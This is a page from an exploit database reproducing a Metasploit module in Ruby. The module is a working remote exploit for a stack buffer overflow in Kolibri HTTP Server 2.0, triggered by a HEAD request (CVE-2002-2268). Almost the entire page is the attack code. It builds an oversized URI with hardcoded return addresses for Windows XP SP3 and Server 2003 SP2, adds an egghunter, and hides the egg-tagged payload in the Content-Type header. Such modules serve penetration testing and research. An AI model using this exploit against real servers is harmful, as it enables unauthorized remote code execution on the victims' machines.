Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtMetasploit1337DAY-ID-15597
HistoryMar 15, 2011 - 12:00 a.m.

Kolibri <= v2.0 HTTP Server HEAD Buffer Overflow

2011-03-1500:00:00
metasploit
0day.today
16
JSON

Exploit for windows platform in category remote exploits

##
# $Id: kolibri_http.rb 10887 2011-08-03 12:19:19Z mr_me $
 
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
    Rank = GoodRanking
 
    HttpFingerprint = { :pattern => [ /kolibri-2\.0/ ] }
 
    include Msf::Exploit::Remote::HttpClient
    include Msf::Exploit::Egghunter
 
    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'Kolibri <= v2.0 HTTP Server HEAD Buffer Overflow',
            'Description'    => %q{This exploits a stack buffer overflow in version 2 of the Kolibri HTTP server.},
            'Author'         =>
                    [
                        'mr_me <[emailΒ protected]>', # msf
                        'TheLeader' # original exploit
                    ],
            'Version'        => '$Revision: 10887 $',
            'References'     =>
                [
                    [ 'CVE', '2002-2268' ],
                    [ 'OSVDB', '70808' ],
                    [ 'BID', '6289' ],
                    [ 'URL', 'http://www.exploit-db.com/exploits/15834/' ],
                ],
            'Privileged'     => false,
            'Payload'        =>
                {
                    'Space'       => 3000,
                    'DisableNops' => true,
                    'BadChars'    => "\x00\x0d\x0a\x3d\x20\x3f",
                },
            'Platform'       => 'win',
            'Targets'        =>
                [
                    [ 'Windows XP sp3', { 'Ret' => 0x7E429353 } ] ,
                    [ 'Windows Server 2003 sp2', { 'Ret' => 0x76F73BC3 } ] ,
                ],
            'DisclosureDate' => 'Dec 26 2010',
            'DefaultTarget'  => 0))
    end
 
    def check
        info = http_fingerprint
        if info and (info =~ /kolibri-2\.0/)
            return Exploit::CheckCode::Vulnerable
        end
        Exploit::CheckCode::Safe
    end
 
    def exploit
        #7E429353    FFE4            JMP     ESP
        # For a reliable and large payload, we use an egg hunter
        # and direct RET to execute code
        print_status("Sending request...")
        eh_stub, eh_egg = generate_egghunter(payload.encoded, payload_badchars)
        sploit = Rex::Text.rand_text_alphanumeric(515) + [target.ret].pack('V')
        sploit << eh_stub
        send_request_raw({
            'uri'     => "/" + sploit,
            'version' => '1.1',
            'method'  => 'HEAD',
            'headers' => {'Content-Type' => eh_egg},
        })
 
        handler
    end
 
end



#  0day.today [2018-01-01]  #

Related

packetstorm 2
metasploit 2
cve 1
exploitdb 2
cvelist 1
nvd 1
packetstorm
packetstorm
Kolibri 2.0 HTTP Server HEAD Buffer Overflow
2011-03-14 00:00:00
Webster HTTP Server GET Buffer Overflow
2010-11-05 00:00:00
metasploit
metasploit
Kolibri HTTP Server HEAD Buffer Overflow
2011-03-13 07:18:36
Webster HTTP Server GET Buffer Overflow
2010-11-03 12:19:19
cve
cve
CVE-2002-2268
2007-10-18 10:00:00
exploitdb
exploitdb
Webster HTTP Server - GET Buffer Overflow (Metasploit)
2010-11-03 00:00:00
Kolibri HTTP Server 2.0 - HEAD Buffer Overflow (Metasploit)
2011-08-03 00:00:00
cvelist
cvelist
CVE-2002-2268
2007-10-18 10:00:00
nvd
nvd
CVE-2002-2268
2002-12-31 05:00:00
JSON
Related for 1337DAY-ID-15597
packetstorm2metasploit2cve1exploitdb2cvelist1nvd1